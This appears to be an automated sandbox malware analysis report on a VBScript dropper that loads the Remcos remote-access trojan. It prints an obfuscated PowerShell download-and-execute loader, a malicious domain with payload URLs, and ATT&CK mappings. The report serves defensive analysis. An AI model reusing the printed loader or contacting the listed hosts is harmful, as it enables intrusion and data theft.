acklstuttto.dufiger.harareacl';$sylterne+=katukina 'stil5stin. mag0sold graa(lo rwsystimyxon pred runohellwmests pla frodnbirtt he v.s1 ble0temp..ili0lill; pol ka.ewim ei onan k i6n,ns4sulu;kati des,xve.s6gtev4cusp;dial kainrraphvkomm:slbe1liti3 ue 1tyra.smaa0so k) mya ,ecogbogeerye.chospkoptrooeer/aspe2phe 0sequ1topn0disl0rets1 .lv0rist1 ,ch kr ofglaii lcrscaleunrufstoronon,xtyra/di p1gris3give1 pul.oxyh0';$konfigurationsmanualers=katukina 'justulettsauspeprotrvitr-endaarastgmotoedro nmil t';$injuriesag=katukina 'mashhfrictgazetnoncpbefrs ana:fl n/st d/petuo towf met1,armxt.is. onci no cu deu .ub/shamcoppoakur.cprenzli ikmacrc d.rp ungfwh.l/ ovss begcborehdronmteleesrgeetoporre h.grunaunjec nata';$taxiflyene192=katukina 'p.em>';$butleress=katukina ' auti eroe d vx';$grubledes='tyrolervalsene';$overgreasiness='\wealthmaking.asr';myndiges (katukina 'inds$anstggl elungrotornbr.nda osalseab:skudaglansoverydowemunimpdef,t el oammot,elaeb dtst,oj=k rt$indbeforsn na v spe:e.kaagoldprakkp ahmdquananegltaffaasarg+arsi$skriosafivbarte intrhologhistrpyloe,lipasammsoverist.tn opbetol s lavs');myndiges (katukina 'olde$j,gog endlkrito xtrbacetagarrlplat:fisscke.ohrenloprickbrilsvl etvet atrmlrtu gt kale mulr al nafruela.i= paa$ordkiforsnart.jch fun.rsrpheni,ugueblacshemiasv,rglyri.fjers rdpstivl supifo,otja.u( .en$adgat n naladyx ondisubsf sa lso dys ine sven unfemoni1ca a9 ose2coa.)');myndiges (katukina $duplicand);$injuriesag=$chokstarterne[0];$remail=(katukina 'syzy$pseugcapnle.rioans b .ndaromalgran:bunkubi etspa iskueletambsul j icrearrolblndiuaneghy r=flyunrougeflatw k,e-frumo,teabunb j ederkescsnyltfabr g,nos adgy s ps midtundeeo ermexot. ,ar$s,nkkonycap ertddssaamphlramno fodg galbansgerhexsger trensijockla.ellf.mbibasinduelg');myndiges ($remail);myndiges (katukina 'kont$ elsuf.ortveltiequilh llbfluxjzooce genl awai ecog,han.,linh ubeesaddaf emdisopeprajr ruksophe[ ike$udlgknytao,ickn etefmagnia sogprinukursrafdea roitun.cim,ljohalvn ants stamstrbaperlng uruhandao,felvolie punrno fsin t]alti=skur$supeszoniy traldodetaruge
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $telekabler; function katukina($fangedragters){$havanlggene=4;$protestantiskes=$havanlggene;do{$commissionship161+=$fangedragters[$protestantiskes];$protestantiskes+=5} until(!$fangedragters[$protestantiskes])$commissionship161}function myndiges($molossian120){ .($butleress) ($molossian120)}$katalogbestilling=katukina ' ovlntomme ejutappe.besvw';$katalogbestilling+=katukina 'b kkeaff.bu secsnitlbajai filefor nnonrt';$sylterne=katukina 'fortm s josirezanbeiskablthrol,hroaopre/';$nonagricultural=katukina 'non tsnerlstarsruff1revi2';$duplicand='slot[ansknhypeeetm tc ll.p gmslimne ba rcontvlistiovercovereha np staotidsi,kolnkl,pt sinmbec.a,quinsammabarsgafsteformrlege]ove.:om r:bhmns ribe a.lc ,otu goervejai pu,tmondyobskpgasvr pr.ofru.tkanoobol cte.mosperlrech=mi l$ ftenhum o ystnpresacounggapprsigii oupcshrau acklstuttto.dufiger.harareacl';$sylterne+=katukina 'stil5stin. mag0sold graa(lo rwsystimyxon pred runohellwmests pla frodnbirtt he v.s1 ble0temp..ili0lill; pol ka.ewim ei onan k i6n,ns4sulu;kati des,xve.s6gtev4cusp;dial kainrraphvkomm:slbe1liti3 ue 1tyra.smaa0so k) mya ,ecogbogeerye.chospkoptrooeer/aspe2phe 0sequ1topn0disl0rets1 .lv0rist1 ,ch kr ofglaii lcrscaleunrufstoronon,xtyra/di p1gris3give1 pul.oxyh0';$konfigurationsmanualers=katukina 'justulettsauspeprotrvitr-endaarastgmotoedro nmil t';$injuriesag=katukina 'mashhfrictgazetnoncpbefrs ana:fl n/st d/petuo towf met1,armxt.is. onci no cu deu .ub/shamcoppoakur.cprenzli ikmacrc d.rp ungfwh.l/ ovss begcborehdronmteleesrgeetoporre h.grunaunjec nata';$taxiflyene192=katukina 'p.em>';$butleress=katukina ' auti eroe d vx';$grubledes='tyrolervalsene';$overgreasiness='\wealthmaking.asr';myndiges (katukina 'inds$anstggl elungrotornbr.nda osalseab:skudaglansoverydowemunimpdef,t el oammot,elaeb dtst,oj=k rt$indbeforsn na v spe:e.kaagoldprakkp ahmdquananegltaffaasarg+arsi$skriosafivbarte intrhologhistrpyloe,lipasammsoverist.tn opbetol s lavs');myndiges (katukina 'olde$j,gog endlkrito xtrbacetagarrlplat:fisscke.ohrenloprickbrilsvl etvet atrmlrtu gt kale mulr al nafruela.i= paa$ordkiforsnart.jch fun.rsrpheni,ugueblacshemiasv,rglyri.fjers rdpstivl supifo,otja.u( .en$adgat n naladyx ondisubsf sa lso dys ine sven unfemoni1ca a9 ose2coa.)');myndiges (katukina $duplicand);$injuriesag=$chokstarterne[0];$remail=(katukina 'syzy$pseugcapnle.rioans b .ndaromalgran:bunkubi etspa iskueletambsul j icrearrolblndiuaneghy r=flyunrougeflatw k,e-frumo,teabunb j ederkescsnyltfabr g,nos adgy s ps midtundeeo ermexot. ,ar$s,nkkonycap ertddssaamphlramno fodg galbansgerhexsger trensijockla.ellf.mbibasinduelg');myndiges ($remail);myndiges (katukina 'kont$ elsuf.ortveltiequilh llbfluxjzooce genl awai ecog,han.,linh ubeesaddaf emdisopeprajr ruksophe[ ike$udlgknytao,ickn etefmagnia sogprinukursrafdea roitun.cim,ljohalvn ants stamstrbaperlng uruhandao,felvolie punrno fsin t]alti=skur$supeszoniy traldodetarugeJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F31A9 FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,FreeSid,AllocateAndInitializeSid,GetLengthSid,memset,GlobalAlloc,InitializeAcl,AddAccessAllowedAce,GetAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetSecurityDescriptorLength,MakeSelfRelativeSD,GetLastError,GlobalFree,GetLastError,FreeSid,9_2_001F31A9
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F30F2 AllocateAndInitializeSid,GetLastError,GetLengthSid,FreeSid,GetLengthSid,memcpy,FreeSid,9_2_001F30F2
              Source: C:\ProgramData\Remcos\remcos.exeCode function: memset,GetACP,LoadLibraryW,GetProcAddress,GetLocaleInfoW,FreeLibrary,FormatMessageW,memset,GetVersionExW,lstrlenW,WriteFile,WriteFile,9_2_001F5C84
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F9E35 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_001F9E35
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_001F63E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW,9_2_001F63E3
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6804, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-6US4Y7Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6804, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		321
              Scripting              		1
              DLL Side-Loading              		2
              Obfuscated Files or Information              		OS Credential Dumping1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts3
              Native API              		1
              DLL Side-Loading              		1
              Access Token Manipulation              		1
              Software Packing              		LSASS Memory1
              File and Directory Discovery              		Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		3
              Windows Service              		3
              Windows Service              		1
              DLL Side-Loading              		Security Account Manager25
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Command and Scripting Interpreter              		11
              Registry Run Keys / Startup Folder              		311
              Process Injection              		1
              Masquerading              		NTDS21
              Security Software Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              Service Execution              		Network Logon Script11
              Registry Run Keys / Startup Folder              		31
              Virtualization/Sandbox Evasion              		LSA Secrets1
              Process Discovery              		SSHKeylogging13
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable Media2
              PowerShell              		RC ScriptsRC Scripts1
              Access Token Manipulation              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
              Process Injection              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579623 Sample: Rokadernes.vbs Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 32 of1x.icu 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Yara detected GuLoader 2->44 46 Yara detected Powershell download and execute 2->46 48 5 other signatures 2->48 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        13 remcos.exe 2->13         started        15 remcos.exe 2->15         started        signatures3 process4 signatures5 50 Early bird code injection technique detected 8->50 52 Writes to foreign memory regions 8->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 8->54 56 Queues an APC in another process (thread injection) 8->56 17 msiexec.exe 2 9 8->17         started        21 conhost.exe 8->21         started        58 VBScript performs obfuscated calls to suspicious functions 11->58 60 Suspicious powershell command line found 11->60 62 Wscript starts Powershell (via cmd or directly) 11->62 64 2 other signatures 11->64 23 powershell.exe 14 18 11->23         started        process6 dnsIp7 30 C:\ProgramData\Remcos\remcos.exe, PE32 17->30 dropped 36 Detected Remcos RAT 17->36 38 Creates autostart registry keys with suspicious names 17->38 26 remcos.exe 17->26         started        34 of1x.icu 104.21.86.72, 443, 49730, 49737 CLOUDFLARENETUS United States 23->34 40 Found suspicious powershell code related to unpacking or dynamic code loading 23->40 28 conhost.exe 23->28         started        file8 signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Rokadernes.vbs0%ReversingLabs
              Rokadernes.vbs5%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\Remcos\remcos.exe0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              of1x.icu
              		104.21.86.72
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://of1x.icu/CACZkcPf/Schmeer.acafalse
                  		unknown
                  https://of1x.icu/rTPVLEPs/asyclWl80.binfalse
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://of1x.ipowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://of1x.icu/CACZkcpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://of1x.icu/1msiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://go.micropowershell.exe, 00000001.00000002.1821899527.00000223BF688000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://of1x.icu/CApowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://of1x.icu/CACZkcPf/Schmepowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://of1x.icu/CACZkcPf/Schmeerpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://of1x.icu/CACZkcPf/Schmeer.apowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://of1x.icu/CACZkcPf/Schmeer.acaXRpowershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://of1x.icu/rTPVLEPs/asyclWl80.binNmsiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://of1x.icu/CACpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://of1x.icpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://of1x.icu/CACZkcPpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2021651093.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://of1x.icu/CACZkcPf/Scpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://of1x.icu/CACZkpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://of1x.icu/CACZkcPf/Spowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://of1x.icu/CACZkcPf/Schmeer.powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://of1x.icu/powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://of1x.icu/CACZkcPf/Schmpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://of1x.icu/CACZkcPf/Schmeer.acpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.2021651093.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://of1x.icu/XVmsiexec.exe, 00000008.00000002.2169804742.0000000006D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://contoso.com/powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2036593483.0000000005F09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://of1x.icupowershell.exe, 00000001.00000002.1821899527.00000223C0480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1821899527.00000223BED38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://of1x.icu/CACZkcPfpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://of1x.icu/CACZkcPf/Schpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1821899527.00000223BEB11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://of1x.icu/CACZkcPf/Schmeer.acaPpowershell.exe, 00000001.00000002.1821899527.00000223BED38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://of1x.icu/CACZkcPf/Schmeepowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1821899527.00000223BEB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2021651093.0000000004EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://of1x.icu/CACZpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://of1x.icu/Cpowershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://of1x.icu/CACZkcPf/powershell.exe, 00000001.00000002.1821899527.00000223C0088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://of1x.icupowershell.exe, 00000001.00000002.1821899527.00000223C07CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		unknown

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      104.21.86.72
                                                                                                      		of1x.icuUnited States
                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1579623
                                                                                                      Start date and time:2024-12-23 06:40:07 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 7m 30s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:13
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:Rokadernes.vbs
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.expl.evad.winVBS@12/8@1/1
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 25%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 89%
                                                                                                      • Number of executed functions: 75
